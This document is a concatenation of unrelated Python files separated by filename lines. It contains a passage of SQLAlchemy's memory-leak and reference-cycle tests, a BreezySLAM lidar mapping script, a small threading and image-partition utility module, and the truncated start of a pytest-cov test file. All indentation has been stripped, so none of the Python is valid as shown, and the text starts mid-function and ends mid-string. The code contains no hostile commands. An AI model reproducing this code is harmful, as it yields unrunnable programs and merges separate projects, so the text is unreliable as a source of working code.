# give testing.db a brand new pool and don't
# touch the existing pool, since closing a socket
# in the subprocess can affect the parent
testing.db.pool = testing.db.pool.recreate()
gc_collect()
samples = []
max_ = 0
max_grew_for = 0
success = False
until_maxtimes = 0
try:
while True:
if until_maxtimes >= maxtimes // 5:
break
for x in range(5):
try:
func(*func_args)
except Exception as err:
queue.put(
(
"result",
False,
"Test raised an exception: %r" % err,
)
)
raise
gc_collect()
samples.append(
get_num_objects()
if get_num_objects is not None
else len(get_objects_skipping_sqlite_issue())
)
if assert_no_sessions:
assert len(_sessions) == 0, "%d sessions remain" % (
len(_sessions),
)
# queue.put(('samples', samples))
latest_max = max(samples[-5:])
if latest_max > max_:
queue.put(
(
"status",
"Max grew from %s to %s, max has "
"grown for %s samples"
% (max_, latest_max, max_grew_for),
)
)
max_ = latest_max
max_grew_for += 1
until_maxtimes += 1
continue
else:
queue.put(
(
"status",
"Max remained at %s, %s more attempts left"
% (max_, max_grew_for),
)
)
max_grew_for -= 1
if max_grew_for == 0:
success = True
break
except Exception as err:
queue.put(("result", False, "got exception: %s" % err))
else:
if not success:
queue.put(
(
"result",
False,
"Ran for a total of %d times, memory kept "
"growing: %r" % (maxtimes, samples),
)
)
else:
queue.put(("result", True, "success"))
def run_plain(*func_args):
import queue as _queue
q = _queue.Queue()
profile(q, func_args)
while True:
row = q.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
assert row[1], row[2]
# return run_plain
def run_in_process(*func_args):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=profile, args=(queue, func_args)
)
proc.start()
while True:
row = queue.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
proc.join()
assert row[1], row[2]
return run_in_process
return decorate
def assert_no_mappers():
clear_mappers()
gc_collect()
class EnsureZeroed(fixtures.ORMTest):
def setup_test(self):
_sessions.clear()
clear_mappers()
# enable query caching, however make the cache small so that
# the tests don't take too long. issues w/ caching include making
# sure sessions don't get stuck inside of it. However it will
# make tests like test_mapper_reset take a long time because mappers
# are very much a part of what's in the cache.
self.engine = engines.testing_engine(
options={"use_reaper": False, "query_cache_size": 10}
)
class MemUsageTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
def test_type_compile(self):
from sqlalchemy.dialects.sqlite.base import dialect as SQLiteDialect
cast = sa.cast(column("x"), sa.Integer)
@profile_memory()
def go():
dialect = SQLiteDialect()
cast.compile(dialect=dialect)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_init(self):
@profile_memory()
def go():
to_decimal_processor_factory({}, 10)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_process(self):
@profile_memory()
def go():
to_decimal_processor_factory(decimal.Decimal, 10)(1.2)
go()
@testing.requires.cextensions
def test_cycles_in_row(self):
tup = result.result_tuple(["a", "b", "c"])
@profile_memory()
def go():
obj = {"foo": {}}
obj["foo"]["bar"] = obj
row = tup([1, 2, obj])
obj["foo"]["row"] = row
del row
go()
def test_ad_hoc_types(self):
"""test storage of bind processors, result processors
in dialect-wide registry."""
from sqlalchemy.dialects import mysql, postgresql, sqlite
from sqlalchemy import types
eng = engines.testing_engine()
for args in (
(types.Integer,),
(types.String,),
(types.PickleType,),
(types.Enum, "a", "b", "c"),
(sqlite.DATETIME,),
(postgresql.ENUM, "a", "b", "c"),
(types.Interval,),
(postgresql.INTERVAL,),
(mysql.VARCHAR,),
):
@profile_memory()
def go():
type_ = args[0](*args[1:])
bp = type_._cached_bind_processor(eng.dialect)
rp = type_._cached_result_processor(eng.dialect, 0)
bp, rp # strong reference
go()
assert not eng.dialect._type_memos
@testing.fails()
def test_fixture_failure(self):
class Foo:
pass
stuff = []
@profile_memory(maxtimes=20)
def go():
stuff.extend(Foo() for i in range(100))
go()
class MemUsageWBackendTest(fixtures.MappedTest, EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = "cpython", "memory_process_intensive", "no_asyncio"
__sparse_backend__ = True
# ensure a pure growing test trips the assertion
@testing.fails_if(lambda: True)
def test_fixture(self):
class Foo:
pass
x = []
@profile_memory(maxtimes=10)
def go():
x[-1:] = [Foo(), Foo(), Foo(), Foo(), Foo(), Foo()]
go()
def test_session(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all(self.engine)
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
)
m2 = self.mapper_registry.map_imperatively(B, table2)
@profile_memory()
def go():
with Session(self.engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
go()
metadata.drop_all(self.engine)
del m1, m2
assert_no_mappers()
def test_sessionmaker(self):
@profile_memory()
def go():
sessmaker = sessionmaker(bind=self.engine)
sess = sessmaker()
r = sess.execute(select(1))
r.close()
sess.close()
del sess
del sessmaker
go()
@testing.emits_warning("Compiled statement cache for mapper.*")
@testing.emits_warning("Compiled statement cache for lazy loader.*")
@testing.crashes("sqlite", ":memory: connection not suitable here")
def test_orm_many_engines(self):
metadata = MetaData(self.engine)
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all()
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
_compiled_cache_size=50,
)
m2 = self.mapper_registry.map_imperatively(
B, table2, _compiled_cache_size=50
)
@profile_memory()
def go():
engine = engines.testing_engine(
options={
"logging_name": "FOO",
"pool_logging_name": "BAR",
"use_reaper": False,
}
)
with Session(engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
engine.dispose()
go()
metadata.drop_all()
del m1, m2
assert_no_mappers()
@testing.emits_warning("Compiled statement cache for.*")
def test_many_updates(self):
metadata = MetaData()
wide_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
*[Column("col%d" % i, Integer) for i in range(10)]
)
class Wide:
pass
self.mapper_registry.map_imperatively(
Wide, wide_table, _compiled_cache_size=10
)
metadata.create_all(self.engine)
with Session(self.engine) as session:
w1 = Wide()
session.add(w1)
session.commit()
del session
counter = [1]
@profile_memory()
def go():
with Session(self.engine) as session:
w1 = session.query(Wide).first()
x = counter[0]
dec = 10
while dec > 0:
# trying to count in binary here,
# works enough to trip the test case
if pow(2, dec) < x:
setattr(w1, "col%d" % dec, counter[0])
x -= pow(2, dec)
dec -= 1
session.commit()
counter[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.requires.savepoints
def test_savepoints(self):
metadata = MetaData()
some_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
class SomeClass:
pass
self.mapper_registry.map_imperatively(SomeClass, some_table)
metadata.create_all(self.engine)
with Session(self.engine) as session:
target_strings = (
session.connection().dialect.identifier_preparer._strings
)
@profile_memory(
assert_no_sessions=False,
get_num_objects=lambda: len(target_strings),
)
def go():
with Session(self.engine) as session, session.begin():
sc = SomeClass()
session.add(sc)
with session.begin_nested():
session.query(SomeClass).first()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_unicode_warnings(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", Unicode(30)),
)
metadata.create_all(self.engine)
i = [1]
# the times here is cranked way up so that we can see
# pysqlite clearing out its internal buffer and allow
# the test to pass
@testing.emits_warning()
@profile_memory()
def go():
# execute with a non-unicode object. a warning is emitted,
# this warning shouldn't clog up memory.
with self.engine.connect() as conn:
conn.execute(
table1.select().where(table1.c.col2 == "foo%d" % i[0])
)
i[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
def test_warnings_util(self):
counter = itertools.count()
import warnings
warnings.filterwarnings("ignore", "memusage warning.*")
@profile_memory()
def go():
util.warn_limited(
"memusage warning, param1: %s, param2: %s",
(next(counter), next(counter)),
)
go()
def test_mapper_reset(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
@profile_memory()
def go():
self.mapper_registry.map_imperatively(
A,
table1,
properties={"bs": relationship(B, order_by=table2.c.col1)},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.flush()
sess.close()
clear_mappers()
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_alias_pathing(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("bid", Integer, ForeignKey("b.id")),
Column("type", String(30)),
)
asub = Table(
"asub",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
Column("data", String(30)),
)
b = Table(
"b",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
self.mapper_registry.map_imperatively(
A, a, polymorphic_identity="a", polymorphic_on=a.c.type
)
self.mapper_registry.map_imperatively(
ASub, asub, inherits=A, polymorphic_identity="asub"
)
self.mapper_registry.map_imperatively(
B, b, properties={"as_": relationship(A)}
)
metadata.create_all(self.engine)
sess = Session(self.engine)
a1 = ASub(data="a1")
a2 = ASub(data="a2")
a3 = ASub(data="a3")
b1 = B(as_=[a1, a2, a3])
sess.add(b1)
sess.commit()
del sess
# sqlite has a slow enough growth here
# that we have to run it more times to see the
# "dip" again
@profile_memory(maxtimes=120)
def go():
sess = Session(self.engine)
sess.query(B).options(subqueryload(B.as_.of_type(ASub))).all()
sess.close()
del sess
try:
go()
finally:
metadata.drop_all(self.engine)
clear_mappers()
def test_path_registry(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Column("bar", Integer),
)
b = Table(
"b",
metadata,
Column("id", Integer, primary_key=True),
Column("a_id", ForeignKey("a.id")),
)
m1 = self.mapper_registry.map_imperatively(
A, a, properties={"bs": relationship(B)}
)
self.mapper_registry.map_imperatively(B, b)
@profile_memory()
def go():
ma = sa.inspect(aliased(A))
m1._path_registry[m1.attrs.bs][ma][m1.attrs.bar]
go()
clear_mappers()
def test_with_inheritance(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
ForeignKey("mytable.col1"),
primary_key=True,
test_needs_autoincrement=True,
),
Column("col3", String(30)),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(A):
pass
clear_mappers()
self.mapper_registry.map_imperatively(
A,
table1,
polymorphic_on=table1.c.col2,
polymorphic_identity="a",
)
self.mapper_registry.map_imperatively(
B, table2, inherits=A, polymorphic_identity="b"
)
sess = Session(self.engine, autoflush=False)
a1 = A()
a2 = A()
b1 = B(col3="b1")
b2 = B(col3="b2")
for x in [a1, a2, b1, b2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(), A(), B(col3="b1"), B(col3="b2")], alist)
for a in alist:
sess.delete(a)
sess.flush()
# don't need to clear_mappers()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_with_manytomany(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table3 = Table(
"t1tot2",
metadata,
Column("t1", Integer, ForeignKey("mytable.col1")),
Column("t2", Integer, ForeignKey("mytable2.col1")),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, secondary=table3, backref="as", order_by=table3.c.t1
)
},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
b1 = B(col2="b1")
b2 = B(col2="b2")
a1.bs.append(b1)
a2.bs.append(b2)
for x in [a1, a2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(bs=[B(col2="b1")]), A(bs=[B(col2="b2")])], alist)
for a in alist:
sess.delete(a)
sess.flush()
# mappers necessarily find themselves in the compiled cache,
# so to allow them to be GC'ed clear out the cache
self.engine.clear_compiled_cache()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_many_discarded_relationships(self):
"""a use case that really isn't supported, nonetheless we can
guard against memleaks here so why not"""
m1 = MetaData()
t1 = Table("t1", m1, Column("id", Integer, primary_key=True))
t2 = Table(
"t2",
m1,
Column("id", Integer, primary_key=True),
Column("t1id", ForeignKey("t1.id")),
)
class T1:
pass
t1_mapper = self.mapper_registry.map_imperatively(T1, t1)
@testing.emits_warning()
@profile_memory()
def go():
class T2:
pass
t2_mapper = self.mapper_registry.map_imperatively(T2, t2)
t1_mapper.add_property("bar", relationship(t2_mapper))
s1 = Session(testing.db)
# this causes the path_registry to be invoked
s1.query(t1_mapper)._compile_context()
go()
# fails on newer versions of pysqlite due to unusual memory behavior
# in pysqlite itself. background at:
# https://thread.gmane.org/gmane.comp.python.db.pysqlite.user/2290
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache_deprecated_coercion(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select()
sess = session()
with testing.expect_deprecated(
"Implicit coercion of SELECT and " "textual SELECT constructs"
):
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = aliased(Bar, table2.select().subquery())
sess = session()
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
class CycleTest(_fixtures.FixtureTest):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
cls._setup_stock_mapping()
def test_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).all()
go()
def test_session_execute_orm(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
stmt = select(User)
s.execute(stmt)
go()
def test_cache_key(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
stmt = select(User)
stmt._generate_cache_key()
go()
def test_proxied_attribute(self):
from sqlalchemy.ext import hybrid
users = self.tables.users
class Foo:
@hybrid.hybrid_property
def user_name(self):
return self.name
self.mapper_registry.map_imperatively(Foo, users)
# unfortunately there's a lot of cycles with an aliased()
# for now, however calling upon clause_element does not seem
# to make it worse which is what this was looking to test
@assert_cycles(69)
def go():
a1 = aliased(Foo)
a1.user_name.__clause_element__()
go()
def test_raise_from(self):
@assert_cycles()
def go():
try:
try:
raise KeyError("foo")
except KeyError as ke:
util.raise_(Exception("oops"), from_=ke)
except Exception as err: # noqa
pass
go()
def test_query_alias(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
u1 = aliased(User)
@assert_cycles()
def go():
s.query(u1).all()
go()
def test_entity_path_w_aliased(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)._path_registry[User.addresses.property]
go()
def test_orm_objects_from_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
def generate():
objects = s.query(User).filter(User.id == 7).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_orm_objects_from_query_w_selectinload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(selectinload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_selectinload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
selectinload(User.addresses)
go()
def test_selectinload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
Load(User).selectinload(User.addresses)
go()
def test_orm_path(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
inspect(User)._path_registry[User.addresses.property][
inspect(Address)
]
go()
def test_joinedload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
joinedload(User.addresses)
go()
def test_joinedload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
l1 = Load(User).joinedload(User.addresses)
l1._generate_cache_key()
go()
def test_orm_objects_from_query_w_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(joinedload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_query_filtered(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).filter(User.id == 7).all()
go()
def test_query_joins(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(4)
def go():
s.query(User).join(User.addresses).all()
go()
def test_query_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
s.query(User).options(joinedload(User.addresses)).all()
# cycles here are due to ClauseElement._cloned_set and Load.context,
# others as of cache key. The orm.instances() function now calls
# dispose() on both the context and the compiled state to try
# to reduce these cycles.
@assert_cycles(18)
def go():
generate()
go()
def test_plain_join(self):
users, addresses = self.tables("users", "addresses")
@assert_cycles()
def go():
str(users.join(addresses).compile(testing.db))
go()
def test_plain_join_select(self):
users, addresses = self.tables("users", "addresses")
# cycles here are due to ClauseElement._cloned_set, others
# as of cache key
@assert_cycles(7)
def go():
s = select(users).select_from(users.join(addresses))
state = s._compile_state_factory(s, s.compile(testing.db))
state.froms
go()
def test_orm_join(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
str(orm_join(User, Address, User.addresses).compile(testing.db))
go()
def test_join_via_query_relationship(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(User.addresses)
go()
def test_join_via_query_to_entity(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(Address)
go()
def test_result_fetchone(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.connection(mapper=User).execute(stmt)
while True:
row = result.fetchone()
if row is None:
break
go()
def test_result_fetchall(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
rows = result.fetchall() # noqa
go()
def test_result_fetchmany(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.partitions(3):
pass
go()
def test_result_fetchmany_unique(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.unique().partitions(3):
pass
go()
def test_core_select_from_orm_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
# ORM query using future select for .statement is adding
# some ORMJoin cycles here during compilation. not worth trying to
# find it
@assert_cycles(4)
def go():
s.execute(stmt)
go()
def test_adapt_statement_replacement_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
replacement_traverse(statement, {}, lambda x: None)
go()
def test_adapt_statement_cloned_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
cloned_traverse(statement, {}, {})
go()
def test_column_adapter_lookup(self):
User, Address = self.classes("User", "Address")
u1 = aliased(User)
@assert_cycles()
def go():
adapter = sql_util.ColumnAdapter(inspect(u1).selectable)
adapter.columns[User.id]
go()
def test_orm_aliased(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)
go()
@testing.fails()
def test_the_counter(self):
@assert_cycles()
def go():
x = []
x.append(x)
go()
def test_weak_sequence(self):
class Foo:
pass
f = Foo()
@assert_cycles()
def go():
util.WeakSequence([f])
go()
@testing.provide_metadata
def test_optimized_get(self):
Base = declarative_base(metadata=self.metadata)
class Employee(Base):
__tablename__ = "employee"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
type = Column(String(10))
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Employee):
__tablename__ = " engineer"
id = Column(ForeignKey("employee.id"), primary_key=True)
engineer_name = Column(String(50))
__mapper_args__ = {"polymorphic_identity": "engineer"}
Base.metadata.create_all(testing.db)
s = Session(testing.db)
s.add(Engineer(engineer_name="wally"))
s.commit()
s.close()
@assert_cycles()
def go():
e1 = s.query(Employee).first()
e1.engineer_name
go()
def test_visit_binary_product(self):
a, b, q, e, f, j, r = [column(chr_) for chr_ in "abqefjr"]
from sqlalchemy import and_, func
from sqlalchemy.sql.util import visit_binary_product
expr = and_((a + b) == q + func.sum(e + f), j == r)
def visit(expr, left, right):
pass
@assert_cycles()
def go():
visit_binary_product(visit, expr)
go()
def test_session_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.close()
go()
def test_session_commit_rollback(self):
# this is enabled by #5074
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.commit()
go()
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.rollback()
go()
def test_session_multi_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
assert s._transaction is None
s.connection()
s.close()
assert s._transaction is None
s.connection()
assert s._transaction is not None
s.close()
go()
|
slam.py
|
from breezylidar import URG04LX as Lidar
from breezyslam.algorithms import RMHC_SLAM
from breezyslam.sensors import URG04LX as LaserModel
from slam_visualization import SlamShow
import threading
from time import sleep
MAP_SIZE_PIXELS = 500
MAP_SIZE_METERS = 10
def save_image(display):
while True:
display.save_image()
sleep(1)
def main():
lidar = Lidar(device='/dev/ttyACM0')
slam = RMHC_SLAM(LaserModel(), map_size_pixels=MAP_SIZE_PIXELS, map_size_meters=MAP_SIZE_METERS)
display = SlamShow(MAP_SIZE_PIXELS, MAP_SIZE_METERS*1000/MAP_SIZE_PIXELS, 'SLAM')
#image_thread = threading.Thread(target=save_image, args=[display])
#image_thread.start()
mapbytes = bytearray(MAP_SIZE_PIXELS * MAP_SIZE_PIXELS)
while True:
slam.update(lidar.getScan())
x, y, theta = slam.getpos()
#print(x, y, theta)
slam.getmap(mapbytes)
display.displayMap(mapbytes)
display.setPose(x, y, theta)
#display.save_image()
display.save_pgm(mapbytes)
if not display.refresh():
exit(0)
if __name__ == '__main__':
main()
|
utils.py
|
import os
import numpy as np
from itertools import zip_longest, accumulate, product,repeat
from types_utils import F
from typing import Any, Iterable, Callable, Sized
from threading import Thread
PATH = os.path.dirname(__file__)
RESOURCES_PATH = os.path.abspath(f"{PATH}/../resources")
def start_join_threads(threads: Iterable["Thread"]) -> None:
"""
Starts all threads in threads and joins all the threads.
:param threads: AN iterable of threads.
"""
for t in threads:
t.start()
for t in threads:
t.join()
def grouper(iterable: Iterable, n: int):
"""
Groups the iterable into a iterable of iterable of len n,
e.g.((x0, x1, ..., xn-1), ((xn, xn+1, ..., x2n-1)), ...)
:param iterable: The iterable to be grouped.
:param n: The length of the groups. (The last group may be less the n in length.)
"""
return zip_discard_generator(*([iter(iterable)] * n))
def zip_discard_generator(*iterables, sentinel: Any = object()):
return ((entry for entry in iterable if entry is not sentinel)
for iterable in zip_longest(*iterables, fillvalue=sentinel))
def parallel_evaluate_iterable(iterable, generate_thread_func: Callable[..., Thread], num_threads: int):
"""
Evaluates a function over an iterable in parallel over several threads.
:param iterable: The items to be evaluated.
:param generate_thread_func: The function evaluating the items.
:param num_threads: The number of threads to use.
"""
if len(iterable) < num_threads:
threads = map(generate_thread_func, iterable)
start_join_threads(threads)
else:
for g in grouper(iterable, num_threads):
threads = map(generate_thread_func, g)
start_join_threads(threads)
def thread_wrapper(func: F):
"""
Wraps a function into a thread call.
:param func: THe function to be wrapped.
"""
def wrapper(*args, **kwargs):
return Thread(target=func, args=args, kwargs=kwargs)
return wrapper
def partitions_with_overlap(image, partition_sizes, partitions_per_dim):
"""
Partition an image with overlap to list of images.
:param image: The image to partition.
:param partition_sizes: The sizes of the partition in each dimension.
:param partitions_per_dim: The number of partition per dimension.
:return: A list of images.
"""
shape = image.shape
assert len(shape) == len(partition_sizes) == len(partitions_per_dim)
dim_parts = []
for s, p, n in zip(shape, partition_sizes, partitions_per_dim):
strides = [(0, p)]
if n > 1:
overlap_diff = p - (p * n - s) / (n - 1)
strides.extend([(a, a + p) for a in accumulate(repeat(overlap_diff, n - 1))])
dim_parts.append(strides)
return [image[[np.s_[round(d0):round(d1)] for d0, d1 in dim_splits]] for dim_splits in product(*dim_parts)]
|
test_pytest_cov.py
|
import glob
import os
import subprocess
import sys
from distutils.version import StrictVersion
from itertools import chain
import coverage
import py
import pytest
import virtualenv
from process_tests import TestProcess as _TestProcess
from process_tests import dump_on_error
from process_tests import wait_for_strings
from six import exec_
from fields import Namespace
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import pytest_cov.plugin
coverage, StrictVersion # required for skipif mark on test_cov_min_from_coveragerc
SCRIPT = '''
import sys, helper
def pytest_generate_tests(metafunc):
for i in range(10):
metafunc.addcall()
def test_foo():
x = True
helper.do_stuff() # get some coverage in some other completely different location
if sys.version_info[0] > 5:
assert False
'''
SCRIPT2 = '''
#
def test_bar():
x = True
assert x
'''
COVERAGERC_SOURCE = '''\
[run]
source = .
'''
SCRIPT_CHILD = '''
import sys
idx = int(sys.argv[1])
if idx == 0:
